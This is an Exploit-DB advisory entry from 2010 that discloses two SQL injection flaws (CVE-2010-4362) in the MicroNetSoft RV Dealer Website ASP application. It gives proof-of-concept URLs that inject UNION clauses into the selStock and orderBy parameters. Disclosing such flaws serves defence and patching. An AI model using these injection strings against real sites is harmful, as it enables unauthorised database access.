MicroNetSoft RV Dealer Website search.asp & showAlllistings.asp - SQL Injection

2010-11-29T00:00:00
ID EDB-ID:15629
Type exploitdb
Reporter underground-stockholm.com
Modified 2010-11-29T00:00:00

Description

MicroNetSoft RV Dealer Website search.asp & showAlllistings.asp - SQL Injection. CVE-2010-4362. Webapps exploit for asp platform

                                        
                                            TITLE: MicroNetSoft RV Dealer Website Two SQL Injection Vulnerabilities
PRODUCT: MicroNetSoft RV Dealer Website
PRODUCT URL: http://www.micronetsoft.com/store/scripts/prodView.asp?idproduct=77
RESEARCHERS: underground-stockholm.com
RESEARCHERS URL: http://underground-stockholm.com/

SQL INJECTION BUGS:

http://[host]/[path]/search.asp?selStock=x%27%20union%20selecta
http://[host]/[path]/showAlllistings.asp?orderBy=union